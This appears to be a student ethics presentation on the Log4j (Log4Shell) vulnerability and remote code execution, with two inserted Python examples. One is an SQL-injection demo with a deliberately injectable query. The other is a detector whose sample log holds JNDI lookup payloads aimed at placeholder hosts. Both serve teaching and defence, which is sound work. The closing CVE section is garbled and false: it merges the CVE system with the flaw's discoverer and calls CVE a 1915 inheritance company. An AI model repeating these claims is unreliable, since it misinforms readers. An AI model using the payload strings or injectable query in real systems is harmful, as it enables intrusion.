Presentation For Ethics


APACHE LOG4J
WHAT IS THE ISSUE?

Log4Shell can result in further dangers such as:

Since JNDI lookup supports several types of directories, including Domain Name Service (DNS), Lightweight Directory Access Protocol (LDAP), and Inter-ORB Protocol (IIOP), which provide useful information like the organization's network devices,

Attackers may use your resources for cryptocurrency mining (coinmining). Given the enormous amount of computing power needed to run services and apps in the cloud, this danger might be highly expensive.
RCE (Remote Code Execution) or REMOTE EXPLOITATION

RCE flaws give an attacker the ability to run any code on a remote device. An attacker can achieve RCE in a number of ways.

➢ ATTACKS USING INJECTION
A variety of applications, including SQL queries, employ user-provided data as input to a command. In an injection attack, the attacker gives input that is purposefully distorted so that a portion of it is read as a command.

➢ ATTACKS ON DESERIALIZATION
The deserializing application may interpret user input that has been specially structured as executable code within the serialized data.

➢ OUT-OF-BOUNDS WRITE
An attacker may be able to create an input that writes outside of the allotted buffer if memory allocation is done improperly. As executable code is also kept in memory, the program may execute user-provided data that is written in the appropriate location.
THE RCE THREAT

Allows an attacker to remotely execute malicious code on a computer.

➢ INITIAL ACCESS
RCE attacks frequently start with a flaw in a publicly accessible application that allows access to run commands on the underlying system. Attackers can use this to take control of a device for the purpose of installing malware or achieving other objectives.

➢ INFORMATION RELEASE
RCE attacks can be used to set up malware that steals data or to run instructions that directly extract and exfiltrate data from the affected device.

➢ DENIAL OF SERVICE
An RCE flaw enables a hacker to execute code on the system that is running the vulnerable application. This might give them the chance to interfere with the way this or other system applications operate.

➢ CRYPTOMINING
Malware that mines cryptocurrencies using the processing power of a compromised device is known as cryptojacking or cryptomining malware. RCE flaws are frequently used to install and run cryptomining malware on susceptible devices.

➢ RANSOMWARE
Ransomware is malware that prevents users from accessing their files unless they pay a ransom to get them back. Ransomware can also be installed and run on a vulnerable device using RCE vulnerabilities.
MITIGATION AND DETECTION OF RCE ATTACKS

RCE attacks can take advantage of a range of vulnerabilities, making it difficult to protect against them with any one approach.

➢ SANITIZATION OF INPUT
Injection and deserialization flaws are frequently exploited in RCE attacks. Many different types of RCE attacks can be avoided by validating user input prior to using it in an application.

➢ SECURE MEMORY MANAGEMENT
Buffer overflows are a memory management problem that RCE attackers can take advantage of. Programs should be subjected to vulnerability scanning to find buffer overflows and other flaws so they can be fixed.

➢ TRAFFIC INSPECTION
As their name implies, RCE attacks take place over networks, with the attacker first gaining access to corporate systems by exploiting weak code. A business should implement network security tools that can stop attempts to exploit weak applications and identify remote attacker control of enterprise systems.

➢ ACCESS CONTROL
An organization can restrict an attacker's ability to move through the network and exploit their initial access to corporate systems by implementing network segmentation, access management, and a zero trust security strategy.
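The injection pattern described under ATTACKS USING INJECTION and the input validation named under SANITIZATION OF INPUT, shown side by side as an added example that is not part of the original presentation. The table, rows, function names and the distorted input are constructed for illustration; the code uses Python's standard sqlite3 module.

```python
import sqlite3

# Constructed input: the quote ends the string literal, the rest is read as SQL.
DISTORTED = "nobody' OR '1'='1"

def make_db():
    """Build an in-memory table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, note TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "note-a"), ("bob", "note-b")])
    return db

def search_vulnerable(db, name):
    """User data is concatenated into the command text."""
    query = "SELECT name, note FROM users WHERE name = '" + name + "'"
    return db.execute(query).fetchall()

def search_parameterized(db, name):
    """User data is bound as a value; the command text never changes."""
    return db.execute(
        "SELECT name, note FROM users WHERE name = ?", (name,)).fetchall()

def search_validated(db, name):
    """Validate before use (allowlist), then still bind as a parameter."""
    if not (name.isalnum() and len(name) <= 32):
        raise ValueError("rejected input")
    return search_parameterized(db, name)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", search_vulnerable(db, DISTORTED))     # every row
    print("parameterized:", search_parameterized(db, DISTORTED))  # no rows
    try:
        search_validated(db, DISTORTED)
    except ValueError as exc:
        print("validated:    ", exc)
```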
JNDI (Java Naming and Directory Interface)

The JNDI naming service maintains a set of bindings that connect names to objects. The lookup method takes a JNDI name as its parameter and returns the object bound to it. JNDI provides a naming context, a collection of name-to-object bindings, and every naming operation is relative to a context. JNDI is an application programming interface (API) that gives applications written in the Java™ programming language directory and naming capability. By definition it is independent of any specific directory service implementation.
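A small form of the traffic inspection named under TRAFFIC INSPECTION, applied to the JNDI lookups this presentation describes, as an added example that is not part of the original slides. The log layout, sample lines, host names and function names are constructed for illustration; the watched schemes are the three directory types the first slide lists.

```python
import re
from collections import Counter

# Directory services the first slide names as reachable through a JNDI lookup.
WATCHED_SCHEMES = {"dns", "ldap", "iiop"}

# A Log4j lookup string of the form ${jndi:<scheme>://<host>...}, any letter case.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s:]+)", re.IGNORECASE)

# Constructed sample access-log lines (not real traffic; hosts are placeholders).
SAMPLE_LOG = """\
10.0.0.5 "GET /index.html" 200 "Mozilla/5.0"
203.0.113.7 "GET /search?q=shoes" 200 "${jndi:ldap://callback.example/a}"
203.0.113.7 "GET /login" 200 "${JNDI:DNS://probe.example/x}"
198.51.100.9 "GET /?id=${jndi:iiop://orb.example/obj}" 404 "curl/8.0"
10.0.0.8 "GET /docs/jndi-overview" 200 "Mozilla/5.0"
"""

def find_jndi_lookups(log_text):
    """Return one finding per JNDI lookup string seen in the log."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for scheme, host in JNDI_LOOKUP.findall(line):
            scheme = scheme.lower()
            findings.append({
                "line": lineno,
                "source": line.split()[0],   # client address is the first field
                "scheme": scheme,
                "host": host.lower(),        # where the lookup would have gone
                "watched": scheme in WATCHED_SCHEMES,
            })
    return findings

def summarize_by_source(findings):
    """Count findings per client address so repeat senders stand out."""
    return Counter(f["source"] for f in findings)

if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(summarize_by_source(hits))
```

The pattern matches only the literal lookup form, so an empty result is weak evidence on its own.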
CVE-2021-44228

➢ WHAT IS CVE
CVE (Common Vulnerabilities and Exposures) was discovered by Chen Zhaojun of the Alibaba Cloud Security Team on Nov 24, 2021, and CVE is an inheritance company founded in 1915 by Henry Frederick Laub.

➢ WHAT IS THE PURPOSE OF THE CVE?
CVE is used to link vulnerability databases and other tools together, and it also facilitates comparisons between services and security tools.

➢ WHO ARE THE VICTIMS OF LOG4J VULNERABILITY?
The victims of the Log4j vulnerability are tech companies like Minecraft, Google, Microsoft, and other big tech companies.
